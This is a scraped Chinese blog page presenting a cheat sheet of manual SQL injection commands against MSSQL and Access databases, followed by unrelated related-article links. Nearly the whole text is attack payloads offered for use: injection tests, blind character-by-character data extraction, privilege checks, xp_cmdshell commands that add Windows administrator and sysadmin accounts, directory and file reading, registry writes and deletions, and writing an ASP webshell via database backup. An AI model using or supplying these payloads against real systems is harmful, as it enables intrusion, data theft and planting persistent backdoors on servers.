zoukankan      html  css  js  c++  java
  • 手工注入命令总汇

    1.判断是否有注入;and 1=1 ;and 1=2

    2.初步判断是否是mssql ;and user>0

    3.注入参数是字符’and [查询条件] and ”=’

    4.搜索时没过滤参数的’and [查询条件] and ‘%25′=’

    5.判断数据库系统 
    ;and (select count(*) from sysobjects)>0 mssql 
    ;and (select count(*) from msysobjects)>0 access

    6.猜数据库;and (select Count(*) from [数据库名])>0

    7.猜字段;and (select Count(字段名) from 数据库名)>0

    8.猜字段中记录长度;and (select top 1 len(字段名) from 数据库名)>0

    9.
    (1)猜字段的ascii值(access) 
    ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
    (2)猜字段的ascii值(mssql) 
    ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

    10.测试权限结构(mssql) 
    ;and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));– 
    ;and 1=(select IS_SRVROLEMEMBER(‘serveradmin’));– 
    ;and 1=(select IS_SRVROLEMEMBER(‘setupadmin’));– 
    ;and 1=(select IS_SRVROLEMEMBER(‘securityadmin’));– 
    ;and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));– 
    ;and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’));– 
    ;and 1=(select IS_MEMBER(‘db_owner’));–

    11.添加mssql和系统的帐户 
    ;exec master.dbo.sp_addlogin username;–
    ;exec master.dbo.sp_password null,username,password;–
    ;exec master.dbo.sp_addsrvrolemember sysadmin username;–
    ;exec master.dbo.xp_cmdshell ‘net user username password /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;–;exec master.dbo.xp_cmdshell ‘net user username password /add’;–
    ;exec master.dbo.xp_cmdshell ‘net localgroup administrators username /add’;–

    12.
    (1)遍历目录
    ;create table dirs(paths varchar(100), id int) 
    ;insert dirs exec master.dbo.xp_dirtree ‘c:’ 
    ;and (select top 1 paths from dirs)>0 
    ;and (select top 1 paths from dirs where paths not in(‘上步得到的paths’))>)
    (2)遍历目录
    ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));– 
    ;insert temp exec master.dbo.xp_availablemedia;– 获得当前所有驱动器 
    ;insert into temp(id) exec master.dbo.xp_subdirs ‘c:’;– 获得子目录列表 
    ;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:’;– 获得所有子目录的目录树构 
    ;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:webindex.asp’;– 查看文件的内容

    13.mssql中的存储过程xp_regenumvalues 注册表根键, 子键 
    ;exec xp_regenumvalues ‘HKEY_LOCAL_MACHINE’,'SOFTWAREMicrosoftWindowsCurrentVersionRun’
    以多个记录集方式返回所有键值xp_regread 根键,子键,键值名 
    ;exec xp_regread 
    ‘HKEY_LOCAL_MACHINE’,'SOFTWAREMicrosoftWindowsCurrentVersion’,'CommonFilesDir’ 
    返回制定键的值xp_regwrite 根键,子键, 值名, 值类型, 值 
    值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 
    ;exec xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWAREMicrosoftWindowsCurrentVersion’,'TestValueName’,'reg_sz’,'hello’
    写入注册表xp_regdeletevalue 根键,子键,值名
    ;exec xp_regdeletevalue
    ‘HKEY_LOCAL_MACHINE’,'SOFTWAREMicrosoftWindowsCurrentVersion’,'TestValueName’
    删除某个值
    ;exec xp_regdeletekey
    ‘HKEY_LOCAL_MACHINE’,'SOFTWAREMicrosoftWindowsCurrentVersionTestkey’ 
    删除键,包括该键下所有值

    14.mssql的backup创建webshell 
    use model 
    create table cmd(str image); 
    insert into cmd(str) values (”); 
    backup database model to disk=’c:l.asp’;

    15.mssql内置函数 
    ;and (select @@version)>0 获得Windows的版本号 
    ;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa 
    ;and (select user_name())>0 爆当前系统的连接用户 
    ;and (select db_name())>0 得到当前连接的数据库

    16.简洁的webshell
    use modelcreate table cmd(str image);insert into cmd(str) values (”);backup database model to disk=’g:wwwtestl.asp’;

  • 相关阅读:
    【Nginx】ngx_event_core_module模块
    ELMAH--Using HTTP Modules and Handlers to Create Pluggable ASP.NET Components 77 out of 90 rated th
    nyist oj 214 单调递增子序列(二) (动态规划经典)
    java 入门书籍(java7)
    ARCGIS将WGS84坐标投影到高斯平面
    【linux】linux下对java程序生成dump文件,并使用IBM Heap Analyzer进行分析,查找定位内存泄漏的问题代码
    【springboot】【socket】spring boot整合socket,实现服务器端两种消息推送
    【linux】linux修改open file 大小
    【docker】docker限制日志文件大小的方法+查看日志文件的方法
    【docker】docker部署spring boot服务,但是docker logs查看容器输出控制台日志,没有日志打印,日志未打印,docker logs不打印容器日志
  • 原文地址:https://www.cnblogs.com/webyihui/p/4003113.html
Copyright © 2011-2022 走看看